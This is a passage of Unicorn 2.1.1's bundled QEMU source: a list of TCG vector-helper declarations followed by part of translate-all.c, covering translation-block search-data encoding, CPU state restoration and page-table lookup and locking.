DEF_HELPER_FLAGS_4(gvec_subs64, TCG_CALL_NO_RWG, void, ptr, ptr, i64, i32) DEF_HELPER_FLAGS_4(gvec_mul8, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(gvec_mul16, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(gvec_mul32, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(gvec_mul64, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(gvec_muls8, TCG_CALL_NO_RWG, void, ptr, ptr, i64, i32) DEF_HELPER_FLAGS_4(gvec_muls16, TCG_CALL_NO_RWG, void, ptr, ptr, i64, i32) DEF_HELPER_FLAGS_4(gvec_muls32, TCG_CALL_NO_RWG, void, ptr, ptr, i64, i32) DEF_HELPER_FLAGS_4(gvec_muls64, TCG_CALL_NO_RWG, void, ptr, ptr, i64, i32) DEF_HELPER_FLAGS_4(gvec_ssadd8, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(gvec_ssadd16, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(gvec_ssadd32, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(gvec_ssadd64, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(gvec_sssub8, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(gvec_sssub16, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(gvec_sssub32, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(gvec_sssub64, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(gvec_usadd8, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(gvec_usadd16, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(gvec_usadd32, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(gvec_usadd64, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(gvec_ussub8, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(gvec_ussub16, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(gvec_ussub32, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(gvec_ussub64, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(gvec_smin8, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(gvec_smin16, TCG_CALL_NO_RWG, void, ptr, 
ptr, ptr, i32) DEF_HELPER_FLAGS_4(gvec_smin32, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(gvec_smin64, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(gvec_smax8, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(gvec_smax16, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(gvec_smax32, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(gvec_smax64, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(gvec_umin8, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(gvec_umin16, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(gvec_umin32, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(gvec_umin64, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(gvec_umax8, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(gvec_umax16, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(gvec_umax32, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(gvec_umax64, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_3(gvec_neg8, TCG_CALL_NO_RWG, void, ptr, ptr, i32) DEF_HELPER_FLAGS_3(gvec_neg16, TCG_CALL_NO_RWG, void, ptr, ptr, i32) DEF_HELPER_FLAGS_3(gvec_neg32, TCG_CALL_NO_RWG, void, ptr, ptr, i32) DEF_HELPER_FLAGS_3(gvec_neg64, TCG_CALL_NO_RWG, void, ptr, ptr, i32) DEF_HELPER_FLAGS_3(gvec_abs8, TCG_CALL_NO_RWG, void, ptr, ptr, i32) DEF_HELPER_FLAGS_3(gvec_abs16, TCG_CALL_NO_RWG, void, ptr, ptr, i32) DEF_HELPER_FLAGS_3(gvec_abs32, TCG_CALL_NO_RWG, void, ptr, ptr, i32) DEF_HELPER_FLAGS_3(gvec_abs64, TCG_CALL_NO_RWG, void, ptr, ptr, i32) DEF_HELPER_FLAGS_3(gvec_not, TCG_CALL_NO_RWG, void, ptr, ptr, i32) DEF_HELPER_FLAGS_4(gvec_and, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(gvec_or, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(gvec_xor, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(gvec_andc, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(gvec_orc, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(gvec_nand, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(gvec_nor, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(gvec_eqv, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(gvec_ands, TCG_CALL_NO_RWG, void, ptr, ptr, i64, i32) DEF_HELPER_FLAGS_4(gvec_xors, TCG_CALL_NO_RWG, void, ptr, ptr, i64, i32) DEF_HELPER_FLAGS_4(gvec_ors, TCG_CALL_NO_RWG, void, ptr, ptr, i64, i32) DEF_HELPER_FLAGS_3(gvec_shl8i, TCG_CALL_NO_RWG, void, ptr, ptr, i32) DEF_HELPER_FLAGS_3(gvec_shl16i, TCG_CALL_NO_RWG, void, ptr, ptr, i32) DEF_HELPER_FLAGS_3(gvec_shl32i, TCG_CALL_NO_RWG, void, ptr, ptr, i32) DEF_HELPER_FLAGS_3(gvec_shl64i, TCG_CALL_NO_RWG, void, ptr, ptr, i32) DEF_HELPER_FLAGS_3(gvec_shr8i, TCG_CALL_NO_RWG, void, ptr, ptr, i32) DEF_HELPER_FLAGS_3(gvec_shr16i, TCG_CALL_NO_RWG, void, ptr, ptr, i32) DEF_HELPER_FLAGS_3(gvec_shr32i, TCG_CALL_NO_RWG, void, ptr, ptr, i32) DEF_HELPER_FLAGS_3(gvec_shr64i, TCG_CALL_NO_RWG, void, ptr, ptr, i32) DEF_HELPER_FLAGS_3(gvec_sar8i, TCG_CALL_NO_RWG, void, ptr, ptr, i32) DEF_HELPER_FLAGS_3(gvec_sar16i, TCG_CALL_NO_RWG, void, ptr, ptr, i32) DEF_HELPER_FLAGS_3(gvec_sar32i, TCG_CALL_NO_RWG, void, ptr, ptr, i32) DEF_HELPER_FLAGS_3(gvec_sar64i, TCG_CALL_NO_RWG, void, ptr, ptr, i32) DEF_HELPER_FLAGS_4(gvec_shl8v, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(gvec_shl16v, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(gvec_shl32v, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) 
DEF_HELPER_FLAGS_4(gvec_shl64v, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(gvec_shr8v, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(gvec_shr16v, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(gvec_shr32v, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(gvec_shr64v, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(gvec_sar8v, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(gvec_sar16v, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(gvec_sar32v, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(gvec_sar64v, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(gvec_eq8, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(gvec_eq16, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(gvec_eq32, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(gvec_eq64, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(gvec_ne8, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(gvec_ne16, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(gvec_ne32, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(gvec_ne64, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(gvec_lt8, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(gvec_lt16, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(gvec_lt32, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(gvec_lt64, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(gvec_le8, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(gvec_le16, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(gvec_le32, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(gvec_le64, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(gvec_ltu8, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(gvec_ltu16, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(gvec_ltu32, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(gvec_ltu64, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(gvec_leu8, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(gvec_leu16, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(gvec_leu32, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(gvec_leu64, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(gvec_bitsel, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32)
unicorn-2.1.1/qemu/accel/tcg/translate-all.c
/* * Host code generation * * Copyright (c) 2003 Fabrice Bellard * * This library is free software; you can redistribute it and/or * modify it under the terms of the GNU Lesser General Public * License as published by the Free Software Foundation; either * version 2.1 of the License, or (at your 
option) any later version. * * This library is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU * Lesser General Public License for more details. * * You should have received a copy of the GNU Lesser General Public * License along with this library; if not, see <http://www.gnu.org/licenses/>. */ #include "qemu/osdep.h" #include "qemu/units.h" #include "qemu-common.h" #define NO_CPU_IO_DEFS #include "cpu.h" #include "exec/exec-all.h" #include "tcg/tcg.h" #include "exec/ram_addr.h" #include "exec/cputlb.h" #include "exec/tb-hash.h" #include "translate-all.h" #include "qemu/bitmap.h" #include "qemu/timer.h" #include "sysemu/cpus.h" #include "sysemu/tcg.h" #include "uc_priv.h" static bool tb_exec_is_locked(struct uc_struct*); static void tb_exec_change(struct uc_struct*, bool locked); /* #define DEBUG_TB_INVALIDATE */ /* #define DEBUG_TB_FLUSH */ /* make various TB consistency checks */ /* #define DEBUG_TB_CHECK */ #ifdef DEBUG_TB_INVALIDATE #define DEBUG_TB_INVALIDATE_GATE 1 #else #define DEBUG_TB_INVALIDATE_GATE 0 #endif #ifdef DEBUG_TB_FLUSH #define DEBUG_TB_FLUSH_GATE 1 #else #define DEBUG_TB_FLUSH_GATE 0 #endif /* TB consistency checks only implemented for usermode emulation. */ #undef DEBUG_TB_CHECK #ifdef DEBUG_TB_CHECK #define DEBUG_TB_CHECK_GATE 1 #else #define DEBUG_TB_CHECK_GATE 0 #endif /* Access to the various translations structures need to be serialised via locks * for consistency. * In user-mode emulation access to the memory related structures are protected * with mmap_lock. * In !user-mode we use per-page locks. */ #define assert_memory_lock() #define SMC_BITMAP_USE_THRESHOLD 10 typedef struct PageDesc { /* list of TBs intersecting this ram page */ uintptr_t first_tb; /* in order to optimize self modifying code, we count the number of lookups we do to a given page to use a bitmap */ unsigned long *code_bitmap; unsigned int code_write_count; } PageDesc; /** * struct page_entry - page descriptor entry * @pd: pointer to the &struct PageDesc of the page this entry represents * @index: page index of the page * @locked: whether the page is locked * * This struct helps us keep track of the locked state of a page, without * bloating &struct PageDesc. * * A page lock protects accesses to all fields of &struct PageDesc. * * See also: &struct page_collection. */ struct page_entry { PageDesc *pd; tb_page_addr_t index; bool locked; }; /** * struct page_collection - tracks a set of pages (i.e. &struct page_entry's) * @tree: Binary search tree (BST) of the pages, with key == page index * @max: Pointer to the page in @tree with the highest page index * * To avoid deadlock we lock pages in ascending order of page index. * When operating on a set of pages, we need to keep track of them so that * we can lock them in order and also unlock them later. For this we collect * pages (i.e. &struct page_entry's) in a binary search @tree. Given that the * @tree implementation we use does not provide an O(1) operation to obtain the * highest-ranked element, we use @max to keep track of the inserted page * with the highest index. This is valuable because if a page is not in * the tree and its index is higher than @max's, then we can lock it * without breaking the locking order rule. * * Note on naming: 'struct page_set' would be shorter, but we already have a few * page_set_*() helpers, so page_collection is used instead to avoid confusion. 
* * See also: page_collection_lock(). */ struct page_collection { GTree *tree; struct page_entry *max; }; /* list iterators for lists of tagged pointers in TranslationBlock */ #define TB_FOR_EACH_TAGGED(head, tb, n, field) \ for (n = (head) & 1, tb = (TranslationBlock *)((head) & ~1); \ tb; tb = (TranslationBlock *)tb->field[n], n = (uintptr_t)tb & 1, \ tb = (TranslationBlock *)((uintptr_t)tb & ~1)) #define PAGE_FOR_EACH_TB(pagedesc, tb, n) \ TB_FOR_EACH_TAGGED((pagedesc)->first_tb, tb, n, page_next) #define TB_FOR_EACH_JMP(head_tb, tb, n) \ TB_FOR_EACH_TAGGED((head_tb)->jmp_list_head, tb, n, jmp_list_next) /* In system mode we want L1_MAP to be based on ram offsets, while in user mode we want it to be based on virtual addresses. */ #if HOST_LONG_BITS < TARGET_PHYS_ADDR_SPACE_BITS # define L1_MAP_ADDR_SPACE_BITS HOST_LONG_BITS #else # define L1_MAP_ADDR_SPACE_BITS TARGET_PHYS_ADDR_SPACE_BITS #endif /* Size of the L2 (and L3, etc) page tables. */ #define V_L2_BITS 10 #define V_L2_SIZE (1 << V_L2_BITS) /* Make sure all possible CPU event bits fit in tb->trace_vcpu_dstate */ QEMU_BUILD_BUG_ON(CPU_TRACE_DSTATE_MAX_EVENTS > sizeof_field(TranslationBlock, trace_vcpu_dstate) * BITS_PER_BYTE); /* The bottom level has pointers to PageDesc, and is indexed by * anything from 4 to (V_L2_BITS + 3) bits, depending on target page size. */ #define V_L1_MIN_BITS 4 #define V_L1_MAX_BITS (V_L2_BITS + 3) #define V_L1_MAX_SIZE (1 << V_L1_MAX_BITS) static void page_table_config_init(struct uc_struct *uc) { uint32_t v_l1_bits; assert(TARGET_PAGE_BITS); /* The bits remaining after N lower levels of page tables. */ v_l1_bits = (L1_MAP_ADDR_SPACE_BITS - TARGET_PAGE_BITS) % V_L2_BITS; if (v_l1_bits < V_L1_MIN_BITS) { v_l1_bits += V_L2_BITS; } uc->v_l1_size = 1 << v_l1_bits; uc->v_l1_shift = L1_MAP_ADDR_SPACE_BITS - TARGET_PAGE_BITS - v_l1_bits; uc->v_l2_levels = uc->v_l1_shift / V_L2_BITS - 1; assert(v_l1_bits <= V_L1_MAX_BITS); assert(uc->v_l1_shift % V_L2_BITS == 0); assert(uc->v_l2_levels >= 0); } /* Encode VAL as a signed leb128 sequence at P. Return P incremented past the encoded value. */ static uint8_t *encode_sleb128(uint8_t *p, target_long val) { int more, byte; do { byte = val & 0x7f; val >>= 7; more = !((val == 0 && (byte & 0x40) == 0) || (val == -1 && (byte & 0x40) != 0)); if (more) { byte |= 0x80; } *p++ = byte; } while (more); return p; } /* Decode a signed leb128 sequence at *PP; increment *PP past the decoded value. Return the decoded value. */ static target_long decode_sleb128(uint8_t **pp) { uint8_t *p = *pp; target_long val = 0; int byte, shift = 0; do { byte = *p++; val |= (target_ulong)(byte & 0x7f) << shift; shift += 7; } while (byte & 0x80); if (shift < TARGET_LONG_BITS && (byte & 0x40)) { #ifdef _MSC_VER val |= ((target_ulong)0 - 1) << shift; #else val |= -(target_ulong)1 << shift; #endif } *pp = p; return val; } /* Encode the data collected about the instructions while compiling TB. Place the data at BLOCK, and return the number of bytes consumed. The logical table consists of TARGET_INSN_START_WORDS target_ulong's, which come from the target's insn_start data, followed by a uintptr_t which comes from the host pc of the end of the code implementing the insn. Each line of the table is encoded as sleb128 deltas from the previous line. The seed for the first line is { tb->pc, 0..., tb->tc.ptr }. That is, the first column is seeded with the guest pc, the last column with the host pc, and the middle columns with zeros. 
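   (Illustrative worked example, added for clarity and not part of the
   original comment:) with TARGET_INSN_START_WORDS == 1, a TB of three
   guest insns at pc, pc+2, pc+5 whose host code ends at offsets 8, 20,
   31 is stored as the delta rows {0,8}, {2,12}, {3,11}. As a concrete
   sleb128 encoding, the value 100 becomes the bytes 0xe4 0x00 and the
   value -3 becomes the single byte 0x7d.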
*/ static int encode_search(struct uc_struct *uc, TranslationBlock *tb, uint8_t *block) { TCGContext *tcg_ctx = uc->tcg_ctx; uint8_t *highwater = tcg_ctx->code_gen_highwater; uint8_t *p = block; int i, j, n; for (i = 0, n = tb->icount; i < n; ++i) { target_ulong prev; for (j = 0; j < TARGET_INSN_START_WORDS; ++j) { if (i == 0) { prev = (j == 0 ? tb->pc : 0); } else { prev = tcg_ctx->gen_insn_data[i - 1][j]; } p = encode_sleb128(p, tcg_ctx->gen_insn_data[i][j] - prev); } prev = (i == 0 ? 0 : tcg_ctx->gen_insn_end_off[i - 1]); p = encode_sleb128(p, tcg_ctx->gen_insn_end_off[i] - prev); /* Test for (pending) buffer overflow. The assumption is that any one row beginning below the high water mark cannot overrun the buffer completely. Thus we can test for overflow after encoding a row without having to check during encoding. */ if (unlikely(p > highwater)) { return -1; } } return p - block; } /* The cpu state corresponding to 'searched_pc' is restored. * When reset_icount is true, current TB will be interrupted and * icount should be recalculated. */ static int cpu_restore_state_from_tb(CPUState *cpu, TranslationBlock *tb, uintptr_t searched_pc, bool reset_icount) { target_ulong data[TARGET_INSN_START_WORDS] = { tb->pc }; uintptr_t host_pc = (uintptr_t)tb->tc.ptr; CPUArchState *env = cpu->env_ptr; uint8_t *p = (uint8_t *)tb->tc.ptr + tb->tc.size; int i, j, num_insns = tb->icount; searched_pc -= GETPC_ADJ; if (searched_pc < host_pc) { return -1; } /* Reconstruct the stored insn data while looking for the point at which the end of the insn exceeds the searched_pc. */ for (i = 0; i < num_insns; ++i) { for (j = 0; j < TARGET_INSN_START_WORDS; ++j) { data[j] += decode_sleb128(&p); } host_pc += decode_sleb128(&p); if (host_pc > searched_pc) { goto found; } } return -1; found: if (reset_icount && (tb_cflags(tb) & CF_USE_ICOUNT)) { /* Reset the cycle counter to the start of the block and shift it to the number of actually executed instructions */ cpu_neg(cpu)->icount_decr.u16.low += num_insns - i; } restore_state_to_opc(env, tb, data); return 0; } bool cpu_restore_state(CPUState *cpu, uintptr_t host_pc, bool will_exit) { TCGContext *tcg_ctx = cpu->uc->tcg_ctx; TranslationBlock *tb; bool r = false; uintptr_t check_offset; struct uc_struct *uc = cpu->uc; /* The host_pc has to be in the region of current code buffer. If * it is not we will not be able to resolve it here. The two cases * where host_pc will not be correct are: * * - fault during translation (instruction fetch) * - fault from helper (not using GETPC() macro) * * Either way we need to return early as we can't resolve it here. * * We are using unsigned arithmetic so if host_pc < * tcg_init_ctx.code_gen_buffer check_offset will wrap to way * above the code_gen_buffer_size */ check_offset = host_pc - (uintptr_t) uc->tcg_ctx->code_gen_buffer; if (check_offset < uc->tcg_ctx->code_gen_buffer_size) { tb = tcg_tb_lookup(tcg_ctx, host_pc); if (tb) { cpu_restore_state_from_tb(cpu, tb, host_pc, will_exit); if (tb_cflags(tb) & CF_NOCACHE) { /* one-shot translation, invalidate it immediately */ tb_phys_invalidate(tcg_ctx, tb, -1); tcg_tb_remove(tcg_ctx, tb); } r = true; } } return r; } static void page_init(struct uc_struct *uc) { page_size_init(uc); page_table_config_init(uc); } static PageDesc *page_find_alloc(struct uc_struct *uc, tb_page_addr_t index, int alloc) { PageDesc *pd; void **lp; int i; /* Level 1. Always allocated. */ lp = uc->l1_map + ((index >> uc->v_l1_shift) & (uc->v_l1_size - 1)); /* Level 2..N-1. 
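   (Descriptive note added for clarity:) each interior level consumes
   V_L2_BITS (10) bits of the page index, so a level-i node is indexed
   with (index >> (i * V_L2_BITS)) & (V_L2_SIZE - 1). The loop below
   walks from uc->v_l2_levels down to the PageDesc leaves, allocating
   missing nodes along the way when @alloc is set.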
*/ for (i = uc->v_l2_levels; i > 0; i--) { void **p = *lp; if (p == NULL) { void *existing; if (!alloc) { return NULL; } p = g_new0(void *, V_L2_SIZE); existing = *lp; if (*lp == NULL) { *lp = p; } if (unlikely(existing)) { g_free(p); p = existing; } } lp = p + ((index >> (i * V_L2_BITS)) & (V_L2_SIZE - 1)); } pd = *lp; if (pd == NULL) { void *existing; if (!alloc) { return NULL; } pd = g_new0(PageDesc, V_L2_SIZE); existing = *lp; if (*lp == NULL) { *lp = pd; } if (unlikely(existing)) { g_free(pd); pd = existing; } } return pd + (index & (V_L2_SIZE - 1)); } static inline PageDesc *page_find(struct uc_struct *uc, tb_page_addr_t index) { return page_find_alloc(uc, index, 0); } static void page_lock_pair(struct uc_struct *uc, PageDesc **ret_p1, tb_page_addr_t phys1, PageDesc **ret_p2, tb_page_addr_t phys2, int alloc); #ifdef CONFIG_DEBUG_TCG static void ht_pages_locked_debug_init(void) { if (ht_pages_locked_debug) { return; } ht_pages_locked_debug = g_hash_table_new(NULL, NULL); } static bool page_is_locked(const PageDesc *pd) { PageDesc *found; ht_pages_locked_debug_init(); found = g_hash_table_lookup(ht_pages_locked_debug, pd); return !!found; } static void page_lock__debug(PageDesc *pd) { ht_pages_locked_debug_init(); g_assert(!page_is_locked(pd)); g_hash_table_insert(ht_pages_locked_debug, pd, pd); } static void page_unlock__debug(const PageDesc *pd) { bool removed; ht_pages_locked_debug_init(); g_assert(page_is_locked(pd)); removed = g_hash_table_remove(ht_pages_locked_debug, pd); g_assert(removed); } static void do_assert_page_locked(const PageDesc *pd, const char *file, int line) { if (unlikely(!page_is_locked(pd))) { // error_report("assert_page_lock: PageDesc %p not locked @ %s:%d", // pd, file, line); abort(); // unreachable in unicorn. } } #define assert_page_locked(pd) do_assert_page_locked(pd, __FILE__, __LINE__) void assert_no_pages_locked(void) { ht_pages_locked_debug_init(); g_assert(g_hash_table_size(ht_pages_locked_debug) == 0); } #else /* !CONFIG_DEBUG_TCG */ #define assert_page_locked(pd) static inline void page_lock__debug(const PageDesc *pd) { } static inline void page_unlock__debug(const PageDesc *pd) { } #endif /* CONFIG_DEBUG_TCG */ static inline void page_lock(PageDesc *pd) { page_lock__debug(pd); } static inline void page_unlock(PageDesc *pd) { page_unlock__debug(pd); } /* lock the page(s) of a TB in the correct acquisition order */ static inline void page_lock_tb(struct uc_struct *uc, const TranslationBlock *tb) { page_lock_pair(uc, NULL, tb->page_addr[0], NULL, tb->page_addr[1], 0); } static inline void page_unlock_tb(struct uc_struct *uc, const TranslationBlock *tb) { PageDesc *p1 = page_find(uc, tb->page_addr[0] >> TARGET_PAGE_BITS); page_unlock(p1); if (unlikely(tb->page_addr[1] != -1)) { PageDesc *p2 = page_find(uc, tb->page_addr[1] >> TARGET_PAGE_BITS); if (p2 != p1) { page_unlock(p2); } } } #if 0 static inline struct page_entry * page_entry_new(PageDesc *pd, tb_page_addr_t index) { struct page_entry *pe = g_malloc(sizeof(*pe)); pe->index = index; pe->pd = pd; // pe->locked = false; return pe; } static void page_entry_destroy(gpointer p) { struct page_entry *pe = p; // g_assert(pe->locked); page_unlock(pe->pd); g_free(pe); } /* returns false on success */ static bool page_entry_trylock(struct page_entry *pe) { bool busy; busy = qemu_spin_trylock(&pe->pd->lock); if (!busy) { g_assert(!pe->locked); pe->locked = true; page_lock__debug(pe->pd); } return busy; } static void do_page_entry_lock(struct page_entry *pe) { page_lock(pe->pd); g_assert(!pe->locked); 
pe->locked = true; } static gboolean page_entry_lock(gpointer key, gpointer value, gpointer data) { struct page_entry *pe = value; do_page_entry_lock(pe); return FALSE; } static gboolean page_entry_unlock(gpointer key, gpointer value, gpointer data) { struct page_entry *pe = value; if (pe->locked) { pe->locked = false; page_unlock(pe->pd); } return FALSE; } /* * Trylock a page, and if successful, add the page to a collection. * Returns true ("busy") if the page could not be locked; false otherwise. */ static bool page_trylock_add(struct uc_struct *uc, struct page_collection *set, tb_page_addr_t addr) { tb_page_addr_t index = addr >> TARGET_PAGE_BITS; struct page_entry *pe; PageDesc *pd; pe = g_tree_lookup(set->tree, &index); if (pe) { return false; } pd = page_find(uc, index); if (pd == NULL) { return false; } pe = page_entry_new(pd, index); g_tree_insert(set->tree, &pe->index, pe); /* * If this is either (1) the first insertion or (2) a page whose index * is higher than any other so far, just lock the page and move on. */ if (set->max == NULL || pe->index > set->max->index) { set->max = pe; do_page_entry_lock(pe); return false; } /* * Try to acquire out-of-order lock; if busy, return busy so that we acquire * locks in order. */ return page_entry_trylock(pe); } static gint tb_page_addr_cmp(gconstpointer ap, gconstpointer bp, gpointer udata) { tb_page_addr_t a = *(const tb_page_addr_t *)ap; tb_page_addr_t b = *(const tb_page_addr_t *)bp; if (a == b) { return 0; } else if (a < b) { return -1; } return 1; } #endif /* * Lock a range of pages ([@start,@end[) as well as the pages of all * intersecting TBs. * Locking order: acquire locks in ascending order of page index. */ struct page_collection * page_collection_lock(struct uc_struct *uc, tb_page_addr_t start, tb_page_addr_t end) { #if 0 struct page_collection *set = g_malloc(sizeof(*set)); tb_page_addr_t index; PageDesc *pd; start >>= TARGET_PAGE_BITS; end >>= TARGET_PAGE_BITS; g_assert(start <= end); set->tree = g_tree_new_full(tb_page_addr_cmp, NULL, NULL, page_entry_destroy); set->max = NULL; assert_no_pages_locked(); retry: g_tree_foreach(set->tree, page_entry_lock, NULL); for (index = start; index <= end; index++) { TranslationBlock *tb; int n; pd = page_find(uc, index); if (pd == NULL) { continue; } if (page_trylock_add(uc, set, index << TARGET_PAGE_BITS)) { g_tree_foreach(set->tree, page_entry_unlock, NULL); goto retry; } assert_page_locked(pd); PAGE_FOR_EACH_TB(pd, tb, n) { if (page_trylock_add(uc, set, tb->page_addr[0]) || (tb->page_addr[1] != -1 && page_trylock_add(uc, set, tb->page_addr[1]))) { /* drop all locks, and reacquire in order */ g_tree_foreach(set->tree, page_entry_unlock, NULL); goto retry; } } } return set; #else return NULL; #endif } void page_collection_unlock(struct page_collection *set) { #if 0 /* entries are unlocked and freed via page_entry_destroy */ g_tree_destroy(set->tree); g_free(set); #endif } static void page_lock_pair(struct uc_struct *uc, PageDesc **ret_p1, tb_page_addr_t phys1, PageDesc **ret_p2, tb_page_addr_t phys2, int alloc) { PageDesc *p1, *p2; tb_page_addr_t page1; tb_page_addr_t page2; assert_memory_lock(); g_assert(phys1 != -1); page1 = phys1 >> TARGET_PAGE_BITS; page2 = phys2 >> TARGET_PAGE_BITS; p1 = page_find_alloc(uc, page1, alloc); if (ret_p1) { *ret_p1 = p1; } if (likely(phys2 == -1)) { page_lock(p1); return; } else if (page1 == page2) { page_lock(p1); if (ret_p2) { *ret_p2 = p1; } return; } p2 = page_find_alloc(uc, page2, alloc); if (ret_p2) { *ret_p2 = p2; 